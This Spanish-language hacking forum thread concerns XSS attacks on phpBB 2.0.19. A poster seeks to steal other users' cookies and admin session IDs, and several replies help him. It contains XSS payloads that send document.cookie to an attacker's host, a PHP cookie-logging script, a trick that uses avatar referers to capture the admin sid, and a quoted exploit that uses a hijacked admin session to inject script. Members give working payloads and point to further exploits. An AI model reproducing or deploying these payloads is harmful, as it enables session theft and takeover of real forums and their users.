Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales
 Autor
|
Tema: phpBB 2.0.19 XSS (Leído 2,672 veces)
|
ignitewtc
 Desconectado
Mensajes: 21
|
hola de nuevo, estoy tratando de usar un cookie steal para esa version del foro, pero como tenia el html desactivado en lso post, logre meter el link a una pagina mia atraves del avatar. es decir cuando alguien visita alguno de mis post, automaticamente, y silenciosamente, ha sido redirigido a un script en php. El problema es que para lanzar el cookie stealer correctamente antes tengo que dirigirlo a otro php en mi host, con el siguiente codigo: <html> <head> <title></title> </head> <body> <pre a='>'onmouseover='document.location=" http://MIHOST/cookie.php?c="+document.cookie' b='<pre' > http://www.target.com/</pre> <?php ?> </body> </html> ENTONCES ME LO ENVIARIA supuesta mente a esta otra: cookie.php <?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('cookies.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>'); fclose($fp); ?> El problema es ese onmouseover= al ir silenciosamente y no mostrarsele al usuario, este no tiene opcion de pasar el raton por encima, con lo cual no lo redirecciona. mi pregunta es si habria alguna forma de que este script se ejecutase solo (el primero), o como quedaria con el parametro onload Muchas gracias  |
|
|
|
|
En línea
|
|
|
|
-sagitari-
Desconectado
Mensajes: 1.640
:D
|
logre meter el link a una pagina mia atraves del avatar Ahora que comentas eso... serías tan amable de explicar cómo? Y otra pregunta... en el caso de que pudiera pasar el ratón por encima, si ese link está en TU HOST, quieres decir que se guardaría la cookie del foro a través de tu host y no desde el foro?  Respecto a lo que dices, pues tendría que haber un código que hiciera lo mismo pero sin el código de tener que pasar por encima, que se ejecutara automáticamente... pero yo no sé cómo... =(
|
|
|
|
|
En línea
|
|
|
|
|
el-brujo
|
jejeje, si parece que lo has hecho al revés. El XSS tienes que usar el del host vulnerable, en este caso el del foro phpBB. http://foro.vulnerable.com/index.php?action=XSS Con lo que: http://foro.vulnerable.com?index.php?action=<script>document.location=http://ww.tudominio.com/script_php_roba_cookies.php?+document.cookie</script> Ahora solo tienes que conseguir que la víctima visite ese enlace... usa tu imaginación..  |
|
|
|
« Última modificación: 10 Septiembre 2006, 00:25 por el-brujo »
|
En línea
|
"elhacker.net es único, por eso no fabrica para otras marcas" - Prohibido prohibir  |
|
|
-sagitari-
Desconectado
Mensajes: 1.640
:D
|
@el-brujo_Gracias por tu contestación , a mí también me ha servido de ayuda =D @ignitewtc_¿Podrías decirme cómo hiciste lo de la imágen para que al visitar tus posts silenciosamente se ejecute el código de la web elegida? , o tú, el-brujo.. si lo sabes..  
|
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
GreenDevil, prueba creandote un usuario nuevo, te vas a profile, y y hay un apartado para enlazar con una avatar remoto ,, debido a un bug puedes poner esto: http://MiHost.com/cookie.php/imagen.jpegcon lo cual esta mostrando la imagen, pero antes esta ejecutando cookie.php y cada uno que vea tu foto, ya sea en tu profile o en algun post, estara siendo redireconado (sin verlo en la pantalla) a http:/host/cookie.php |
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
brujo, no lo entiendo muy bien :  mi script funciona perfectamente, cuando lo haces desde el ie directamente, pasas el raton por el nombre y me escribe la cookie del host que le indico en un archivo txt, asi funciona perfectamente, el problema viene cuando el codigo se esta ejecutando automaticamente, y el user no lo esta viendo. Porque deberia pasar el raton por el nombre para que la cookie se escriba, pero no puede porque no lo ve, lo que pregunto es como puedo cambiar ese onmouseover= para que se ejecute directamente sin que tena que pasar el raton algo asi como un onload, pero de tal forma que el codigo siga igual y me guarde las cookies del sitio en cuestion ......"+document.cookie' b='<pre' > http://www.sitiovulnerable.net/</pre> El codigo que necesito modificar: <pre a='>' onmouseover='document.location=" http://midominio.no-ip.info/nuevo.php?c="+document.cookie' b='<pre' > http://www.sitiovulnerable.net/</pre> O sino, como puedo implementar dichas ordenesde que me guarde la cookie del sitio que le indique: ......"+document.cookie' b='<pre' > http://www.sitiovulnerable.net/</pre> En el mismo cookie_stealer.php y lo enlazo directamente con el?? |
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
No se puede implementar todo el script en el codigo de una sola pagina php en mi dominio y que cuando se visite salte todo? que no tenga que pasar por 2 enlaces??
yo puedo hacer uqe enlacen directamente con mi pagina, pero lo suyo es un solo script
|
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
El problema es que solo puedo ahcer que la victima visite una pagina sin codigo:
mi victima visitara esto
http:/MIDOMINIO/cookie.php/imagen.jpeg
con lo cual solo se el ejecuta el cokiee.php
mi pregunta es si hay alguna manera de que en cookie.php se ejecvute todo el codigo necesario para conseguir la su cookie de un determinado sitio.
*Perdon por postear tanto pero es que me voy dando cuenta sobre la marcha
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
si solo se carga como imagen NO.. incluso si fuera un iframe, no tienes acceso al documento en TOP.. con ese codigo que tienes de cookie.php lo mucho que puedes hacer es obtener el IP de la victima.. y pocas cosas mas, como saber navegador etc.. para poder robar la cookie, necesitas que en alguna url EN EL DOMINIO www.victima.com (por ejemplo), exista una zona donde puedas inyectar codigo HTML.. ya de ahi ya usas el self.location.href='miweb.com/c.php?q='+escape(document.cookie); @greendevil, no lo hizo, no te compliqes Saludos!! |
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
supuestamente se puede injectar codigo html en el admin smilies, en esa version del foro, dicen que teniendo la sid del admin, funciona, pero yo lo he comprobado, y te repide el password.. tambien se puede injectar codigo html en cur. passwod, lo he `probado pèro no se que utilidad tiene. METODO para averiguar la Sid del admin: pues eso: en el avatar pones http:/tuhost/cookie.php ahora te vas al foro y spameas lo mas posible para que te baneen, y es que phpBB 2.0.19 tiene un fallo de que muestra en el panel de control del amin http://sitio/phpBB2/admin/index.php?sid=AQUIDID DE ADMIN cuando tebanee cookie registrara ese referer y ya tienes el sid, que hacer on el?? pues no se, alguien tiene alguna idea? |
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
Por si a alguien le interesa, acabo de comprobar que se pueden insertar script tambien en la cabecera exif de las imagener, y subirlas como avatar
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
lo de anexar el codigo en el avatar si se puede, pero solo si el server te permite subir imagenes.. y sobre obtener el sid del referrer, pues si sirve de mucho, este rgod publico varios exploits que te permitian tomar control del servidor con la sid, busca en google , aunque me parece que esta en milw0rm Saludos!! |
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
<?php
# SecurityReason.Com writed by Maksymilian Arciemowicz
# Example exploit
$operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&s
mile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20'; #
http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=icon_mrgree
n.gif" onmouseover='alert(document.cookie)'
$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);
if($sid[1]!=''){
header("Location: ".$operation."&sid=".$sid[1]);
}
?>
He encontrado este pequeño script: lo que hace es: basandose en que desde el panel del admin, aparece su sid en el web browser( al estas este codigo incluido en tu avatar) el admin ve tu profile oa lgun post tuyo y esto se lanza, coge de su web browser http referer toma su sid y la pone detras de la operacion con lo cual el ejecuta desde su web browser dicha operacion para la que esta autorizado (ya que tomo su sid), al ejecutar esa accion, añade a un emoticon un script, al pasar el raton sobre el emoticon, el script se ejecuta (en este caso es de alerta, pero bie podria ser un get document.cookie y que te lo mande a tu web). Ahora bien, no consigo hacer funcionar este script, me da muchos errores. el priemro de ellos: Parse error: syntax error, unexpected T_STRING in c:/lalalala/lalalala/script.php on line 14
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
<?php
# SecurityReason.Com writed by Maksymilian Arciemowicz
# Example exploit
$operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&s
mile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20';
$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);
if($sid[1]!=''){
header("Location: ".$operation."&sid=".$sid[1]);
}
?>
debes fijarte muy bien en lo que quieres hacer. debes cambiar [Host] y [Dir] por la ruta a la web. segun parece, podrias agregarte al grupo de admnistradores si sabes como armar el codigo. no pidas que lo hagan por ti, trata de hacerlo  Saludos!!
|
|
|
|
|
En línea
|
|
|
|
ignitewtc
Desconectado
Mensajes: 21
|
el codigo ya no da errores, pero tampoco hace nada..o eso aprece
debereia agregar al emoticon green: un script, pero el icon sigue estando igual... no se que puede haber mal
|
|
|
|
|
En línea
|
|
|
|
|
 |
